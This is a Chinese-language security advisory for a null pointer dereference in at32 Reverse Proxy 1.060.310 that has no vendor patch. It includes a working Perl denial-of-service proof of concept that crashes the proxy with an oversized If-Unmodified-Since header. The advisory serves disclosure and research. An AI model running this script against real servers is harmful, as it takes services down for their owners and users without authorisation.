发布日期:2012-03-20
更新日期:2012-03-21
受影响系统:
at32 at32 Reverse Proxy 1.060.310
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52553
at32 Reverse Proxy允许在单个IP或端口上服务保存多个网站。
at32 Reverse Proxy在HTTP代理服务中的HTTP标头字段(例如If-Modified-Since、Server等)中存在空指针引用漏洞,可通过HTTP标头中的超长字符串,造成崩溃。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
demonalex ()提供了如下测试方法:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*****************************************'."\n";
print '* At32 Reverse Proxy v1.060.310 DoS PoC *'."\n";
print '* writed by demonalex (at) 163 (dot) com [email concealed] *'."\n";
print '*****************************************'."\n";
$evil='A'x10000;
$test_ip=shift; #target ip
$test_port=shift; #target port
if(!defined($test_ip) || !defined($test_port)){
die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
at32
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: